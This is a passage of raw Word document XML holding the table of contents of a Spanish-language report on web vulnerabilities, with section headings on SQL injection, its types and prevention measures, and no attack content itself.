            <w:tabs>
              <w:tab w:val="left" w:pos="110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6776191" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCCIÓN</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776191 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03897E92" w14:textId="42EDA7BD" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776192" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PERFIL</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776192 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CC962AE" w14:textId="0F7C9156" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776193" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PROBLEMA</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776193 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64DB9D87" w14:textId="583835BB" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776194" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>OBJETIVO GENERAL</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776194 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="58372898" w14:textId="283E6EC2" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776195" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>OBJETIVOS ESPECIFICOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776195 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="571D4647" w14:textId="230636E9" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776196" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>JUSTIFICACION</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776196 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="191E03B0" w14:textId="38CC99B7" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1100"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776197" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>FUNDAMENTACION TEORICA</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776197 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2F802E03" w14:textId="3ED0631D" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776198" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PANORAMA ACTUAL DE LAS VULNERABILIDADES WEB</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776198 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6371EFF8" w14:textId="0C43658E" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776199" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>SQL INJECTION</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776199 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="250FF6DB" w14:textId="07FC175C" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776200" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.2.1</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DEFINICION Y MECANISMO</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776200 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="707DE967" w14:textId="4B96E6AF" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776201" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.2.2</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>TIPOS DE SQL INJECTION Y SUS MECANISMOS</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776201 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="296FF6F3" w14:textId="2A2847B9" w:rsidR="0031097F" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TDC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1869"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc196776202" w:history="1">
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>3.2.3</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F" w:rsidRPr="008F45A2">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MEDIDAS DE PREVENCION</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196776202 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="0031097F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
